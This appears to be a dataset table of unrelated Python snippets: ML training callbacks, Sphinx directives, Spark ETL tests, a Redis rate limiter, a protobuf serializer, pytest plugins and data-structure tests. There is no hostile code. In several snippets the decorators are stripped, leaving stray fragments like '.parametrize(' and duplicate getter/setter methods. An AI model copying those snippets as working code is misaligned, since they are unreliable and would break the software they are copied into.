code stringlengths 281 23.7M |
|---|
class GradientNormClipping(Callback['Trainer[BaseConfig, Any]']):
def on_backward_end(self, trainer: 'Trainer[BaseConfig, Any]') -> None:
clip_norm = trainer.config.training.clip_grad_norm
if (clip_norm is not None):
clip_gradient_norm(parameters=trainer.learnable_parameters, total_norm=trainer.total_gradient_norm, clip_norm=clip_norm) |
class PyWinAutoLoader(Loader):
def __init__(self):
self._original_coinit_flags_defined = False
self._original_coinit_flags = None
def set_sys_coinit_flags(self):
self._original_coinit_flags_defined = hasattr(sys, 'coinit_flags')
self._original_coinit_flags = getattr(sys, 'coinit_flags', None)
sys.coinit_flags = pythoncom.COINIT_APARTMENTTHREADED
def reset_sys_coinit_flags(self):
if (not self._original_coinit_flags_defined):
del sys.coinit_flags
else:
sys.coinit_flags = self._original_coinit_flags
def create_module(self, spec):
self.set_sys_coinit_flags()
from koapy.compat import pyside2
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
module = importlib.import_module(spec.name)
return module
def exec_module(self, module):
pass |
class GridItemCardDirective(SphinxDirective):
has_content = True
required_arguments = 0
optional_arguments = 1
final_argument_whitespace = True
option_spec = {'columns': item_columns_option, 'margin': margin_option, 'padding': padding_option, 'class-item': directives.class_option, 'width': make_choice(['auto', '25%', '50%', '75%', '100%']), 'text-align': text_align, 'img-background': directives.uri, 'img-top': directives.uri, 'img-bottom': directives.uri, 'img-alt': directives.unchanged, 'link': directives.uri, 'link-type': make_choice(['url', 'any', 'ref', 'doc']), 'link-alt': directives.unchanged, 'shadow': make_choice(['none', 'sm', 'md', 'lg']), 'class-card': directives.class_option, 'class-body': directives.class_option, 'class-title': directives.class_option, 'class-header': directives.class_option, 'class-footer': directives.class_option, 'class-img-top': directives.class_option, 'class-img-bottom': directives.class_option}
def run(self) -> List[nodes.Node]:
if (not is_component(self.state_machine.node, 'grid-row')):
LOGGER.warning(f"The parent of a 'grid-item' should be a 'grid-row' [{WARNING_TYPE}.grid]", location=(self.env.docname, self.lineno), type=WARNING_TYPE, subtype='grid')
column = create_component('grid-item', ((((['sd-col', 'sd-d-flex-row'] + self.options.get('columns', [])) + self.options.get('margin', [])) + self.options.get('padding', [])) + self.options.get('class-item', [])))
card_options = {key: value for (key, value) in self.options.items() if (key in ['width', 'text-align', 'img-background', 'img-top', 'img-bottom', 'img-alt', 'link', 'link-type', 'link-alt', 'shadow', 'class-card', 'class-body', 'class-title', 'class-header', 'class-footer', 'class-img-top', 'class-img-bottom'])}
if ('width' not in card_options):
card_options['width'] = '100%'
card_options['margin'] = []
card = CardDirective.create_card(self, self.arguments, card_options)
column += card
return [column] |
class Submission(DB.Model):
__tablename__ = 'submissions'
id = DB.Column(DB.Integer, primary_key=True)
submitted_at = DB.Column(DB.DateTime)
form_id = DB.Column(DB.Integer, DB.ForeignKey('forms.id'), nullable=False)
data = DB.Column(MutableDict.as_mutable(JSON))
def __init__(self, form_id):
self.submitted_at = datetime.datetime.utcnow()
self.form_id = form_id
def __repr__(self):
return ('<Submission %s, form=%s, date=%s, keys=%s>' % ((self.id or 'with an id to be assigned'), self.form_id, self.submitted_at.isoformat(), self.data.keys())) |
class TestInitialRun():
def initial_run(s3_data_bucket, load_source_tables=True, load_other_raw_tables=None, initial_copy=True):
_load_tables_to_delta(s3_data_bucket, load_source_tables, load_other_raw_tables)
call_params = ['load_transactions_in_delta', '--etl-level', 'initial_run', '--spark-s3-bucket', s3_data_bucket]
if (not initial_copy):
call_params.append('--no-initial-copy')
call_command(*call_params)
def verify_transaction_ids(spark, expected_transaction_id_lookup, expected_last_load=None):
query = 'SELECT * FROM int.transaction_id_lookup ORDER BY transaction_id'
delta_data = [row.asDict() for row in spark.sql(query).collect()]
assert equal_datasets(expected_transaction_id_lookup, delta_data, '')
with connection.cursor() as cursor:
cursor.execute("SELECT nextval('transaction_id_seq')")
max_transaction_id = cursor.fetchone()[0]
if expected_transaction_id_lookup:
assert (max_transaction_id == max([transaction['transaction_id'] for transaction in expected_transaction_id_lookup]))
else:
assert (max_transaction_id == 1)
with connection.cursor() as cursor:
cursor.execute(f"SELECT setval('transaction_id_seq', {max_transaction_id}, false)")
def verify_award_ids(spark, expected_award_id_lookup, expected_last_load=None):
query = 'SELECT * FROM int.award_id_lookup ORDER BY award_id, transaction_unique_id'
delta_data = [row.asDict() for row in spark.sql(query).collect()]
assert equal_datasets(expected_award_id_lookup, delta_data, '')
with connection.cursor() as cursor:
cursor.execute("SELECT nextval('award_id_seq')")
max_award_id = cursor.fetchone()[0]
if expected_award_id_lookup:
assert (max_award_id == max([award['award_id'] for award in expected_award_id_lookup]))
else:
assert (max_award_id == 1)
with connection.cursor() as cursor:
cursor.execute(f"SELECT setval('award_id_seq', {max_award_id}, false)")
def verify_lookup_info(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_last_load_transaction_id_lookup=None, expected_load_load_award_id_lookup=None):
TestInitialRun.verify_transaction_ids(spark, expected_transaction_id_lookup, expected_last_load_transaction_id_lookup)
TestInitialRun.verify_award_ids(spark, expected_award_id_lookup, expected_load_load_award_id_lookup)
def verify_raw_vs_int_tables(spark, table_name, col_names):
result = spark.sql(f'''
SELECT {', '.join(col_names)} FROM int.{table_name}
MINUS
SELECT {', '.join(col_names)} FROM raw.{table_name}
''').collect()
assert (len(result) == 0)
result = spark.sql(f'''
SELECT {', '.join(col_names)} FROM raw.{table_name}
MINUS
SELECT {', '.join(col_names)} FROM int.{table_name}
''').collect()
assert (len(result) == 0)
def verify(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_normalized_count=0, expected_fabs_count=0, expected_fpds_count=0, expected_last_load_transaction_id_lookup=None, expected_last_load_award_id_lookup=None, expected_last_load_transaction_normalized=None, expected_last_load_transaction_fabs=None, expected_last_load_transaction_fpds=None):
TestInitialRun.verify_lookup_info(spark, expected_transaction_id_lookup, expected_award_id_lookup, expected_last_load_transaction_id_lookup, expected_last_load_award_id_lookup)
actual_count = spark.sql('SELECT COUNT(*) AS count from int.award_ids_delete_modified').collect()[0]['count']
assert (actual_count == 0)
for (table_name, expected_count, expected_last_load, col_names) in zip((f'transaction_{t}' for t in ('normalized', 'fabs', 'fpds')), (expected_normalized_count, expected_fabs_count, expected_fpds_count), (expected_last_load_transaction_normalized, expected_last_load_transaction_fabs, expected_last_load_transaction_fpds), (list(TRANSACTION_NORMALIZED_COLUMNS), TRANSACTION_FABS_COLUMNS, TRANSACTION_FPDS_COLUMNS)):
actual_count = spark.sql(f'SELECT COUNT(*) AS count from int.{table_name}').collect()[0]['count']
assert (actual_count == expected_count)
if (expected_count > 0):
try:
spark.sql(f'SELECT 1 FROM raw.{table_name}')
except pyspark.sql.utils.AnalysisException as e:
if re.match(f'Table or view not found: raw\.{table_name}', e.desc):
pass
else:
raise e
else:
TestInitialRun.verify_raw_vs_int_tables(spark, table_name, col_names)
_db(transaction=True)
def test_edge_cases_using_only_source_tables(self, spark, s3_unittest_data_bucket, hive_unittest_metastore_db):
raw_db = 'raw'
spark.sql(f'create database if not exists {raw_db};')
spark.sql(f'use {raw_db};')
spark.sql(TABLE_SPEC['published_fabs']['delta_table_create_sql'].format(DESTINATION_TABLE='published_fabs', DESTINATION_DATABASE=raw_db, SPARK_S3_BUCKET=s3_unittest_data_bucket, DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH))
spark.sql(TABLE_SPEC['detached_award_procurement']['delta_table_create_sql'].format(DESTINATION_TABLE='detached_award_procurement', DESTINATION_DATABASE=raw_db, SPARK_S3_BUCKET=s3_unittest_data_bucket, DELTA_LAKE_S3_PATH=CONFIG.DELTA_LAKE_S3_PATH))
call_command('load_transactions_in_delta', '--etl-level', 'initial_run', '--spark-s3-bucket', s3_unittest_data_bucket, '--no-initial-copy')
kwargs = {'expected_last_load_transaction_id_lookup': _BEGINNING_OF_TIME, 'expected_last_load_award_id_lookup': _BEGINNING_OF_TIME, 'expected_last_load_transaction_normalized': _BEGINNING_OF_TIME, 'expected_last_load_transaction_fabs': _BEGINNING_OF_TIME, 'expected_last_load_transaction_fpds': _BEGINNING_OF_TIME}
TestInitialRun.verify(spark, [], [], **kwargs) |
def record(oid, tag, value, **context):
if ('started' not in moduleContext):
moduleContext['started'] = time.time()
if ('iterations' not in moduleContext):
moduleContext['iterations'] = min(1, moduleContext['settings'].get('iterations', 0))
iterations = moduleContext['settings'].get('iterations')
if (not iterations):
if (context['origValue'].tagSet not in INTEGER_TYPES):
if ('hextag' in context):
tag = context['hextag']
if ('hexvalue' in context):
value = context['hexvalue']
return (oid, tag, value)
if (('taglist' not in moduleContext['settings']) or (tag not in moduleContext['settings']['taglist'])):
return (oid, tag, value)
value = ('initial=%s' % value)
if (context['origValue'].tagSet == rfc1902.TimeTicks.tagSet):
value += ',rate=100'
elif (context['origValue'].tagSet == rfc1902.Integer.tagSet):
value += ',rate=0'
return (oid, (tag + ':numeric'), value)
if (oid not in moduleContext):
settings = {'initial': value}
if (context['origValue'].tagSet == rfc1902.TimeTicks.tagSet):
settings['rate'] = 100
elif (context['origValue'].tagSet == rfc1902.Integer.tagSet):
settings['rate'] = 0
if ('addon' in moduleContext['settings']):
settings.update(dict([split(x, '=') for x in moduleContext['settings']['addon']]))
moduleContext[oid] = {}
moduleContext[oid]['settings'] = settings
if moduleContext['iterations']:
if context['stopFlag']:
log.info(('numeric: %s iterations remaining' % moduleContext['iterations']))
moduleContext['iterations'] -= 1
moduleContext['started'] = time.time()
running = (time.time() - moduleContext['started'])
wait = max(0, (float(moduleContext['settings']['period']) - running))
raise error.MoreDataNotification(period=wait)
else:
moduleContext[oid]['time'] = time.time()
moduleContext[oid]['value'] = context['origValue']
if ('hexvalue' in moduleContext[oid]):
moduleContext[oid]['hexvalue'] = context['hexvalue']
if ('hextag' in moduleContext[oid]):
moduleContext[oid]['hextag'] = context['hextag']
raise error.NoDataNotification()
else:
if context['stopFlag']:
raise error.NoDataNotification()
if ('value' in moduleContext[oid]):
if (context['origValue'].tagSet not in INTEGER_TYPES):
if ('hextag' in moduleContext[oid]):
tag = moduleContext[oid]['hextag']
if ('hexvalue' in moduleContext[oid]):
value = moduleContext[oid]['hexvalue']
return (oid, tag, value)
if (tag not in moduleContext['settings']['taglist']):
return (oid, tag, moduleContext[oid]['value'])
diff = (int(context['origValue']) - int(moduleContext[oid]['value']))
runtime = (time.time() - moduleContext[oid]['time'])
moduleContext[oid]['settings']['rate'] = (diff / runtime)
tag += ':numeric'
value = ','.join([('%s=%s' % (k, v)) for (k, v) in moduleContext[oid]['settings'].items()])
return (oid, tag, value)
else:
raise error.NoDataNotification() |
def _rule_match(analysis_plugin, filename, expected_rule_name, expected_number_of_rules=1):
path = os.path.join(TEST_DATA_DIR, filename)
test_file = FileObject(file_path=path)
analysis_plugin.process_object(test_file)
number_of_rules = (len(test_file.processed_analysis[analysis_plugin.NAME]) - 1)
assert (number_of_rules == expected_number_of_rules), f'Number of results is {number_of_rules} but should be {expected_number_of_rules}'
if (expected_rule_name is not None):
assert (expected_rule_name in test_file.processed_analysis[analysis_plugin.NAME]), f'Expected rule {expected_rule_name} missing' |
def test_parse_schema_includes_hint_with_list():
'
schema = [{'type': 'record', 'name': 'test_parse_schema_includes_hint_with_list_1', 'doc': 'blah', 'fields': [{'name': 'field1', 'type': 'string', 'default': ''}]}, {'type': 'record', 'name': 'test_parse_schema_includes_hint_with_list_2', 'doc': 'blah', 'fields': [{'name': 'field2', 'type': 'string', 'default': ''}]}]
parsed_schema = parse_schema(schema)
for s in parsed_schema:
assert ('__fastavro_parsed' in s) |
class RateLimiter():
EXPIRE_AFTER_PERIOD_SECONDS: int = 500
def build_redis_key(self, current_seconds: int, request: RateLimiterRequest) -> str:
fixed_time_filter = (int((current_seconds / request.period.factor)) * request.period.factor)
redis_key = f'{request.key}:{request.period.label}:{fixed_time_filter}'
return redis_key
def increment_usage(self, redis: FidesopsRedis, current_seconds: int, requests: List[RateLimiterRequest]) -> List[int]:
pipe = redis.pipeline()
for request in requests:
redis_key = self.build_redis_key(current_seconds=current_seconds, request=request)
pipe.incrby(redis_key, 1)
pipe.expire(redis_key, (request.period.factor + self.EXPIRE_AFTER_PERIOD_SECONDS))
response = pipe.execute()
found_bucket_usages = []
for (index, request) in enumerate(requests):
found_bucket_usages.append(response[(index * 2)])
return found_bucket_usages
def decrement_usage(self, redis: FidesopsRedis, current_seconds: int, requests: List[RateLimiterRequest]) -> None:
pipe = redis.pipeline()
for request in requests:
redis_key = self.build_redis_key(current_seconds=current_seconds, request=request)
pipe.decrby(redis_key, 1)
pipe.execute()
def limit(self, requests: List[RateLimiterRequest], timeout_seconds: int=30) -> None:
try:
redis: FidesopsRedis = get_cache()
except RedisConnectionError as exc:
logger.warning('Failed to connect to redis, skipping limiter for requests {}. {}', ','.join((str(r) for r in requests)), exc)
return
start_time = time.time()
while ((time.time() - start_time) < timeout_seconds):
current_seconds = int(time.time())
bucket_usages = self.increment_usage(redis=redis, current_seconds=current_seconds, requests=requests)
breached_requests = [request for (index, request) in enumerate(requests) if (bucket_usages[index] > request.rate_limit)]
if breached_requests:
logger.debug('Breached rate limits: {}. Decrementing usage and trying again.', ','.join((str(r) for r in breached_requests)))
self.decrement_usage(redis=redis, current_seconds=current_seconds, requests=requests)
time.sleep(0.1)
else:
return
error_message = f"Timeout waiting for rate limiter. Last breached requests: {','.join((str(r) for r in breached_requests))}"
logger.error(error_message)
raise RateLimiterTimeoutException(error_message) |
class FipaSerializer(Serializer):
def encode(msg: Message) -> bytes:
msg = cast(FipaMessage, msg)
message_pb = ProtobufMessage()
dialogue_message_pb = DialogueMessage()
fipa_msg = fipa_pb2.FipaMessage()
dialogue_message_pb.message_id = msg.message_id
dialogue_reference = msg.dialogue_reference
dialogue_message_pb.dialogue_starter_reference = dialogue_reference[0]
dialogue_message_pb.dialogue_responder_reference = dialogue_reference[1]
dialogue_message_pb.target = msg.target
performative_id = msg.performative
if (performative_id == FipaMessage.Performative.CFP):
performative = fipa_pb2.FipaMessage.Cfp_Performative()
query = msg.query
Query.encode(performative.query, query)
fipa_msg.cfp.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.PROPOSE):
performative = fipa_pb2.FipaMessage.Propose_Performative()
proposal = msg.proposal
Description.encode(performative.proposal, proposal)
fipa_msg.propose.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.ACCEPT_W_INFORM):
performative = fipa_pb2.FipaMessage.Accept_W_Inform_Performative()
info = msg.info
performative.info.update(info)
fipa_msg.accept_w_inform.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT_W_INFORM):
performative = fipa_pb2.FipaMessage.Match_Accept_W_Inform_Performative()
info = msg.info
performative.info.update(info)
fipa_msg.match_accept_w_inform.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.INFORM):
performative = fipa_pb2.FipaMessage.Inform_Performative()
info = msg.info
performative.info.update(info)
fipa_msg.inform.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.ACCEPT):
performative = fipa_pb2.FipaMessage.Accept_Performative()
fipa_msg.accept.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.DECLINE):
performative = fipa_pb2.FipaMessage.Decline_Performative()
fipa_msg.decline.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT):
performative = fipa_pb2.FipaMessage.Match_Accept_Performative()
fipa_msg.match_accept.CopyFrom(performative)
elif (performative_id == FipaMessage.Performative.END):
performative = fipa_pb2.FipaMessage.End_Performative()
fipa_msg.end.CopyFrom(performative)
else:
raise ValueError('Performative not valid: {}'.format(performative_id))
dialogue_message_pb.content = fipa_msg.SerializeToString()
message_pb.dialogue_message.CopyFrom(dialogue_message_pb)
message_bytes = message_pb.SerializeToString()
return message_bytes
def decode(obj: bytes) -> Message:
message_pb = ProtobufMessage()
fipa_pb = fipa_pb2.FipaMessage()
message_pb.ParseFromString(obj)
message_id = message_pb.dialogue_message.message_id
dialogue_reference = (message_pb.dialogue_message.dialogue_starter_reference, message_pb.dialogue_message.dialogue_responder_reference)
target = message_pb.dialogue_message.target
fipa_pb.ParseFromString(message_pb.dialogue_message.content)
performative = fipa_pb.WhichOneof('performative')
performative_id = FipaMessage.Performative(str(performative))
performative_content = {}
if (performative_id == FipaMessage.Performative.CFP):
pb2_query = fipa_pb.cfp.query
query = Query.decode(pb2_query)
performative_content['query'] = query
elif (performative_id == FipaMessage.Performative.PROPOSE):
pb2_proposal = fipa_pb.propose.proposal
proposal = Description.decode(pb2_proposal)
performative_content['proposal'] = proposal
elif (performative_id == FipaMessage.Performative.ACCEPT_W_INFORM):
info = fipa_pb.accept_w_inform.info
info_dict = dict(info)
performative_content['info'] = info_dict
elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT_W_INFORM):
info = fipa_pb.match_accept_w_inform.info
info_dict = dict(info)
performative_content['info'] = info_dict
elif (performative_id == FipaMessage.Performative.INFORM):
info = fipa_pb.inform.info
info_dict = dict(info)
performative_content['info'] = info_dict
elif (performative_id == FipaMessage.Performative.ACCEPT):
pass
elif (performative_id == FipaMessage.Performative.DECLINE):
pass
elif (performative_id == FipaMessage.Performative.MATCH_ACCEPT):
pass
elif (performative_id == FipaMessage.Performative.END):
pass
else:
raise ValueError('Performative not valid: {}.'.format(performative_id))
return FipaMessage(message_id=message_id, dialogue_reference=dialogue_reference, target=target, performative=performative, **performative_content) |
def setUpModule():
Practice.objects.create(code='N84014', name='AINSDALE VILLAGE SURGERY')
Practice.objects.create(code='P84034', name='BARLOW MEDICAL CENTRE')
Practice.objects.create(code='Y02229', name='ADDACTION NUNEATON')
ImportLog.objects.create(current_at='2039-12-01', category='patient_list_size')
ImportLog.objects.create(current_at=PRESCRIBING_DATE, category='prescribing') |
def flatten_groups(*geometries: GeometryType, flatten_nonunion_type: bool=False) -> GeometryType:
for geometry in geometries:
if isinstance(geometry, base.GeometryGroup):
(yield from flatten_groups(*geometry.geometries, flatten_nonunion_type=flatten_nonunion_type))
elif (isinstance(geometry, base.ClipOperation) and (flatten_nonunion_type or (geometry.operation == 'union'))):
(yield from flatten_groups(geometry.geometry_a, geometry.geometry_b, flatten_nonunion_type=flatten_nonunion_type))
else:
(yield geometry) |
class TestMergePipeline():
.parametrize('data', datas)
def test_fit_execute_simple(self, data):
columns = ['revenue', 'netinc', 'ncf', 'ebitda', 'debt', 'fcf']
f1 = QuarterlyFeatures(data_key='quarterly', columns=columns, quarter_counts=[2, 10], max_back_quarter=1)
target1 = QuarterlyTarget(data_key='quarterly', col='marketcap', quarter_shift=0)
target2 = QuarterlyTarget(data_key='quarterly', col='marketcap', quarter_shift=(- 1))
model = lgbm.sklearn.LGBMRegressor()
pipeline1 = Pipeline(data=data, feature=f1, target=target1, model=model, out_name='p1')
pipeline2 = Pipeline(data=data, feature=f1, target=target2, model=model, out_name='p2')
pipeline3 = LoadingPipeline(data['quarterly'], ['ticker', 'date', 'marketcap'])
merge1 = MergePipeline(pipeline_list=[pipeline1, pipeline2, pipeline3], execute_merge_on=['ticker', 'date'])
merge1.fit(tickers)
df_m1 = merge1.execute(tickers)
pipeline1.fit(tickers)
pipeline2.fit(tickers)
merge2 = MergePipeline(pipeline_list=[pipeline1, pipeline2, pipeline3], execute_merge_on=['ticker', 'date'])
df1 = pipeline1.execute(tickers)
df2 = pipeline2.execute(tickers)
df3 = pipeline3.execute(tickers)
df_m2 = merge1.execute(tickers)
df_m3 = merge1.execute(tickers, 2)
assert (type(df_m1) == pd.DataFrame)
assert (type(df_m2) == pd.DataFrame)
assert (len(df_m1) == len(df1))
assert (len(df_m2) == len(df1))
np.testing.assert_array_equal(df_m1.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
np.testing.assert_array_equal(df_m2.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
np.testing.assert_array_equal(df_m3.columns, ['ticker', 'date', 'p1', 'p2', 'marketcap'])
np.testing.assert_array_equal(df1['p1'], df_m1['p1'])
np.testing.assert_array_equal(df2['p2'], df_m1['p2'])
np.testing.assert_array_equal(df_m1['p1'], df_m2['p1'])
np.testing.assert_array_equal(df_m1['p2'], df_m2['p2'])
np.testing.assert_array_equal(df_m2['p1'], df_m3['p1'])
np.testing.assert_array_equal(df_m2['p2'], df_m3['p2']) |
class TestUSSPP(unittest.TestCase):
def test_fetch_production(self):
filename = 'parsers/test/mocks/US_SPP_Gen_Mix.pkl'
fake_data = read_pickle(filename)
with LogCapture() as log:
with patch('parsers.US_SPP.get_data') as gd:
gd.return_value = fake_data
data = US_SPP.fetch_production(logger=logging.getLogger('test'))
datapoint = data[(- 1)]
with self.subTest():
self.assertIsInstance(data, list)
with self.subTest():
self.assertEqual(len(data), 23)
with self.subTest():
self.assertEqual(round(datapoint['production']['unknown'], 2), 33.1)
with self.subTest():
expected_dt = get(datetime(2018, 7, 27, 11, 45), 'UTC').datetime
self.assertEqual(datapoint['datetime'], expected_dt)
with self.subTest():
self.assertEqual(datapoint['source'], 'spp.org')
with self.subTest():
self.assertEqual(datapoint['zoneKey'], 'US-SPP')
with self.subTest():
self.assertIsInstance(datapoint['storage'], dict)
def test_SPP_logging(self):
filename = 'parsers/test/mocks/US_SPP_Gen_Mix.pkl'
fake_data = read_pickle(filename)
with LogCapture() as log:
with patch('parsers.US_SPP.get_data') as gd:
gd.return_value = fake_data
data = US_SPP.fetch_production(logger=logging.getLogger('test'))
log.check(('test', 'WARNING', "New column 'Flux Capacitor' present in US-SPP data source.")) |
.parametrize('bytecode,link_refs,attr_dict,expected', ((bytearray(60), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1]}], {'SafeSendLib': SAFE_SEND_CANON}, ((b'\x00' + SAFE_SEND_CANON) + bytearray(39))), (bytearray(60), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1, 31]}], {'SafeSendLib': SAFE_SEND_CANON}, ((((b'\x00' + SAFE_SEND_CANON) + bytearray(10)) + SAFE_SEND_CANON) + bytearray(9))), (bytearray(80), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1, 50]}, {'length': 20, 'name': 'SafeMathLib', 'offsets': [25]}], {'SafeSendLib': SAFE_SEND_CANON, 'SafeMathLib': SAFE_MATH_CANON}, ((((((b'\x00' + SAFE_SEND_CANON) + bytearray(4)) + SAFE_MATH_CANON) + bytearray(5)) + SAFE_SEND_CANON) + bytearray(10)))))
def test_apply_all_link_refs(bytecode, link_refs, attr_dict, expected):
actual = apply_all_link_refs(bytecode, link_refs, attr_dict)
assert (actual == expected) |
class ChatDestinationCache():
def __init__(self, mode: str, size: int=CHAT_DEST_CACHE_SIZE):
self.enabled = (mode in ('enabled', 'warn'))
if self.enabled:
self.weak: 'WeakValueDictionary[str, ChatDestination]' = WeakValueDictionary()
self.strong: Deque[ChatDestination] = deque(maxlen=size)
def get(self, key: str) -> Optional[EFBChannelChatIDStr]:
if (not self.enabled):
return None
val = self.weak.get(key, None)
if (val is not None):
if (time.time() > val.expiry):
self.strong.remove(val)
self.weak.pop(key)
return None
else:
return val.destination
return None
def is_warned(self, key: str) -> bool:
if (not self.enabled):
return True
return ((key in self.weak) and self.weak[key].warned)
def set_warned(self, key: str):
if (not self.enabled):
return
if (key in self.weak):
self.weak[key].warned = True
def set(self, key: str, value: EFBChannelChatIDStr, timeout: float=CHAT_DEST_CACHE_TIMEOUT):
if (not self.enabled):
return
if ((key in self.weak) and (self.weak[key].destination == value)):
self.weak[key].update_timeout(timeout)
else:
self.weak[key] = strong_ref = ChatDestination(value, timeout)
self.strong.append(strong_ref)
def remove(self, key: str):
if (not self.enabled):
return
return self.weak.pop(key, None) |
class JsonFormatter(logging.Formatter):
def format(self, record):
log_entry = {'level': record.levelname, 'timestamp': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')}
if isinstance(record.msg, dict):
log_entry.update(record.msg)
return json.dumps(log_entry) |
class ServicePlanTestCaseTestFunction(Function):
def __init__(self, parent, fixture_test_case_data):
cls = parent.parent.obj
test_name = 'plan__{fixture}__{test}'.format(fixture=fixture_test_case_data.fixture_name, test=fixture_test_case_data.name)
if hasattr(cls, test_name):
raise StatusError('Duplicate test name "{name}" in fixture "{fixture}"'.format(name=fixture_test_case_data.name, fixture=fixture_test_case_data.fixture_file))
fixture_test_case_data.callable.__doc__ = fixture_test_case_data.description
setattr(cls, test_name, fixture_test_case_data.callable)
super(ServicePlanTestCaseTestFunction, self).__init__(name=test_name, parent=parent)
self._location = (self.session.fspath.bestrelpath(py.path.local(fixture_test_case_data.fixture_file)), fixture_test_case_data.line_number, self.location[2])
self.fspath = py.path.local(fixture_test_case_data.fixture_file)
self._nodeid = '::'.join((self.nodeid.split('::', 2)[:2] + [fixture_test_case_data.fixture_name, fixture_test_case_data.name]))
self.fixture_test_case_data = fixture_test_case_data
skipped = False
for mark in _get_unpacked_marks(cls):
mark_copy = getattr(MARK_GEN, mark.name)(*mark.args, **mark.kwargs)
self.add_marker(mark_copy)
if ((mark.name == 'skip') or ((mark.name == 'skipif') and mark.args and mark.args[0])):
skipped = True
if ((not skipped) and fixture_test_case_data.skip):
self.add_marker(pytest.mark.skip(reason=fixture_test_case_data.skip))
def setup(self):
super(Function, self).setup()
if self.fixture_test_case_data.is_first_fixture_case:
setattr(self.parent.obj, '_pytest_first_fixture_case', self.fixture_test_case_data)
if self.fixture_test_case_data.is_last_fixture_case:
setattr(self.parent.obj, '_pytest_last_fixture_case', self.fixture_test_case_data)
fixtures.fillfixtures(self)
def runtest(self):
PLUGIN_STATISTICS['fixture_tests_executed'] += 1
super(ServicePlanTestCaseTestFunction, self).runtest()
def _prunetraceback(self, exception_info):
lowest_test_case_frame = next((tb for tb in reversed(exception_info.traceback) if (tb.locals.get('_test_function_frame', False) or tb.locals.get('_run_test_case_frame', False))), None)
super(ServicePlanTestCaseTestFunction, self)._prunetraceback(exception_info)
if (not lowest_test_case_frame):
return
if (self.config.getoption('pysoa_disable_tb_prune') is not True):
exception_info.traceback = exception_info.traceback.filter((lambda x: (not x.frame.f_globals.get('__test_plan_prune_traceback'))))
test_case = lowest_test_case_frame.locals['test_case']
locals_to_copy = {'job_response', 'action_results', 'action_case'}
if lowest_test_case_frame.locals.get('_test_function_frame', False):
locals_to_copy = {'test_fixture_results', 'test_case'}
extra_entry = ServicePlanFixtureTestTracebackEntry(name='{cls}::{fixture}::{test}'.format(cls=lowest_test_case_frame.locals['self'].__class__.__name__, fixture=test_case['fixture_name'], test=test_case['name']), line_number=test_case['line_number'], path=py.path.local(test_case['fixture_file_name']), local_variables={k: v for (k, v) in six.iteritems(lowest_test_case_frame.locals) if (k in locals_to_copy)}, fixture_source=test_case['fixture_source'], test_source=test_case['source'], raw_entry=lowest_test_case_frame._rawentry)
exception_info.traceback.append(extra_entry) |
class TaskID(str):
def __new__(cls, value, request=None):
obj = str.__new__(cls, value)
if request:
obj.__dict__.update(request.__dict__)
return obj
def __repr__(self):
return ('<%s: %s>' % (self.__class__.__name__, self))
def prefix(self):
return task_prefix_from_task_id(self) |
def test_invert():
ar = Compose([AffineAutoregressive(params.DenseAutoregressive()), AffineAutoregressive(params.DenseAutoregressive())])
shape = torch.Size([16])
bij = ar(shape=shape)
inv_bij = bijectors.Invert(ar)(shape=shape)
inv_bij.load_state_dict(bij.state_dict(prefix='bijector.'))
x = torch.randn(50, 16, requires_grad=True)
torch.testing.assert_allclose(inv_bij.forward(x), bij.inverse(x))
y = inv_bij.forward(x)
with warnings.catch_warnings():
warnings.simplefilter('error')
inv_bij.log_abs_det_jacobian(x, y)
with pytest.warns(UserWarning):
y_det = y.detach_from_flow()
inv_bij.log_abs_det_jacobian(x, y_det)
y = y.detach_from_flow()
torch.testing.assert_allclose(inv_bij.log_abs_det_jacobian(x, y), bij.log_abs_det_jacobian(y, x)) |
class Contrast(Filter):
NAME = 'contrast'
ALLOWED_SPACES = ('srgb-linear', 'srgb')
def filter(self, color: 'Color', amount: Optional[float], **kwargs: Any) -> None:
amount = alg.clamp((1 if (amount is None) else amount), 0)
for (e, c) in enumerate(color[:(- 1)]):
color[e] = linear_transfer(c, amount, ((1 - amount) * 0.5)) |
class OptionPlotoptionsWindbarbSonificationTracksMappingHighpassResonance(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def extractWentaoxuelinBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class TestMinHeap(unittest.TestCase):
def test_min_heap(self):
heap = MinHeap()
self.assertEqual(heap.peek_min(), None)
self.assertEqual(heap.extract_min(), None)
heap.insert(20)
self.assertEqual(heap.array[0], 20)
heap.insert(5)
self.assertEqual(heap.array[0], 5)
self.assertEqual(heap.array[1], 20)
heap.insert(15)
self.assertEqual(heap.array[0], 5)
self.assertEqual(heap.array[1], 20)
self.assertEqual(heap.array[2], 15)
heap.insert(22)
self.assertEqual(heap.array[0], 5)
self.assertEqual(heap.array[1], 20)
self.assertEqual(heap.array[2], 15)
self.assertEqual(heap.array[3], 22)
heap.insert(40)
self.assertEqual(heap.array[0], 5)
